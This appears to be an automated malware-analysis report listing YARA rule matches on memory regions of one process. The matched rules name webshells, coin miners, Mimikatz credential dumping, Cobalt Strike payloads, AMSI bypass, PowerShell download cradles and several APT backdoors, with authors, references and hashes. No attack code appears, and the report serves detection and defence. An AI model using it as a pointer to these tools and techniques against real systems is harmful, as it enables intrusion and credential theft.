Source: 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: MirageStrings author = Seth Hardy, description = Mirage Identifying Strings, last_modified = 2014-06-25
Source: 00000023.00000003.6320985176.0000028BD7280000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000023.00000003.6320985176.0000028BD7280000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.6320985176.0000028BD7280000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
Source: 00000023.00000003.6348467864.0000028BD78B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 00000023.00000003.6432796132.0000028BD7D95000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 00000023.00000003.6307602633.0000028BD60E4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_PowerShell_IEX_Download_Combo date = 2018-10-04, hash1 = 13297f64a5f4dd9b08922c18ab100d3a3e6fdeab82f60a4653ab975b8ce393d5, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_generic date = 2021/01/14, author = Arnim Rupp, description = php webshell having some kind of input and some kind of payload. restricted to small files or big ones inclusing suspicious strings, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = bee1b76b1455105d4bfe2f45191071cf05e83a309ae9defcf759248ca9bceddd
Source: 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_generic_eval date = 2021/01/07, author = Arnim Rupp, description = Generic PHP webshell which uses any eval/exec function in the same line with user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 90c5cc724ec9cf838e4229e5e08955eec4d7bf95
Source: 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: ChinaChopper_Generic date = 2015/03/10, author = Florian Roth, description = China Chopper Webshells - PHP and ASPX, reference = https://www.fireeye.com/content/dam/legacy/resources/pdfs/fireeye-china-chopper-report.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp, type: MEMORY	Matched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp, type: MEMORY	Matched rule: IMPLANT_5_v3 date = 2017-02-10, author = US CERT, description = XTunnel Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp, type: MEMORY	Matched rule: malware_red_leaves_memory author = David Cannings, description = Red Leaves C&C left in memory, use with Volatility / Rekall
Source: 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Base64_PS1_Shellcode date = 2018-11-14, author = Nick Carr, David Ledbetter, description = Detects Base64 encoded PS1 Shellcode, reference = https://twitter.com/ItsReallyNick/status/1062601684566843392, score =
Source: 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Pupy_Backdoor date = 2017-08-11, hash5 = 06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e, hash4 = 20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8, hash3 = 90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc, hash2 = 83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4, hash1 = ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153, author = Florian Roth, description = Detects Pupy backdoor, hash7 = 8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01, hash6 = be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2, reference = https://github.com/n1nj4sec/pupy-binaries, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.6264910076.0000028BD7D54000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 00000023.00000003.6276483685.0000028BD76A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000023.00000003.6276483685.0000028BD76A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_obfuscated_encoding date = 2021/04/18, author = Arnim Rupp, description = PHP webshell obfuscated by encoding, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.6276483685.0000028BD76A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000023.00000003.6276483685.0000028BD76A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: xtremrat date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0
Source: 00000023.00000003.6273486144.0000028BD7B45000.00000004.00000001.sdmp, type: MEMORY	Matched rule: TA17_293A_malware_1 date = 2017/07/17, hash5 = 038A97B4E2F37F34B255F0643E49FC9D, hash4 = 04738CA02F59A5CD394998A99FCD9613, hash3 = 8943E71A8C73B5E343AA9D2E19002373, hash2 = BA756DD64C1147515BA2298B6A760260, hash1 = A07AA521E7CAFB360294E56969EDA5D6, hash0 = 61C909D2F625223DB2FB858BBDF42A76, author = US-CERT Code Analysis Team (modified by Florian Roth), description = inveigh pen testing tools & related artifacts, hash10 = 4595DBE00A538DF127E0079294C87DA0, hash9 = 722154A36F32BA10E98020A8AD758A7A, hash8 = 5DBEF7BDDAF50624E840CCBCE2816594, hash7 = AA905A3508D9309A93AD5C0EC26EBC9B, hash6 = 65A1A73253F04354886F375B59550B46, reference = https://www.us-cert.gov/ncas/alerts/TA17-293A
Source: 00000023.00000003.6273486144.0000028BD7B45000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.6399025086.0000028BD6EA1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.6399025086.0000028BD6EA1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000023.00000003.6311413449.0000028BD79B9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000023.00000003.6311413449.0000028BD79B9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
Source: 00000023.00000003.6284624022.0000028BD68F5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: clearlog date = 2017-06-02, hash1 = 14093ce6d0fe8ab60963771f48937c669103842a0400b8d97f829b33c420f7e3, author = Florian Roth, description = Detects Fireball malware - file clearlog.dll, reference = https://goo.gl/4pTkGQ, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp, type: MEMORY	Matched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.6316150838.0000028BD6D56000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.6348949380.0000028BD7D54000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Base64_PS1_Shellcode date = 2018-11-14, author = Nick Carr, David Ledbetter, description = Detects Base64 encoded PS1 Shellcode, reference = https://twitter.com/ItsReallyNick/status/1062601684566843392, score =
Source: 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b
Source: 00000023.00000003.6344420092.0000028BD7070000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.6423998600.0000028BD6EA1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.6423998600.0000028BD6EA1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 00000023.00000003.6295229489.0000028BD65FD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_DeputyDog_Fexel author = ThreatConnect Intelligence Research Team
Source: 00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 00000023.00000003.6299891132.0000028BD7070000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.6398582086.0000028BD6E91000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.6398582086.0000028BD6E91000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_generic date = 2021/01/14, author = Arnim Rupp, description = php webshell having some kind of input and some kind of payload. restricted to small files or big ones inclusing suspicious strings, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = bee1b76b1455105d4bfe2f45191071cf05e83a309ae9defcf759248ca9bceddd
Source: 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 00000023.00000003.6333202344.0000028BD76A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000023.00000003.6333202344.0000028BD76A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_obfuscated_encoding date = 2021/04/18, author = Arnim Rupp, description = PHP webshell obfuscated by encoding, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.6333202344.0000028BD76A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000023.00000003.6333202344.0000028BD76A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000023.00000003.6332319497.0000028BD7A3C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000023.00000003.6308819602.0000028BD71FC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: xtremrat date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0
Source: 00000023.00000003.6292767693.0000028BD7F7B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp, type: MEMORY	Matched rule: HackTool_Samples description = Hacktool, score =
Source: 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PS_AMSI_Bypass date = 2017-07-19, author = Florian Roth, description = Detects PowerShell AMSI Bypass, reference = https://gist.github.com/mattifestation/46d6a2ebb4a1f4f0e7229503dc012ef1, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = file
Source: 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000023.00000003.6320105225.0000028BD6890000.00000004.00000001.sdmp, type: MEMORY	Matched rule: RemCom_RemoteCommandExecution date = 2017-12-28, author = Florian Roth, description = Detects strings from RemCom tool, reference = https://goo.gl/tezXZt, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_PowerShell_IEX_Download_Combo date = 2018-10-04, hash1 = 13297f64a5f4dd9b08922c18ab100d3a3e6fdeab82f60a4653ab975b8ce393d5, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.6318934861.0000028BD62E5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_jsp_by_string date = 2021/01/09, author = Arnim Rupp, description = JSP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions., license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 06b42d4707e7326aff402ecbb585884863c6351a
Source: 00000023.00000003.6324978129.0000028BD7280000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000023.00000003.6324978129.0000028BD7280000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
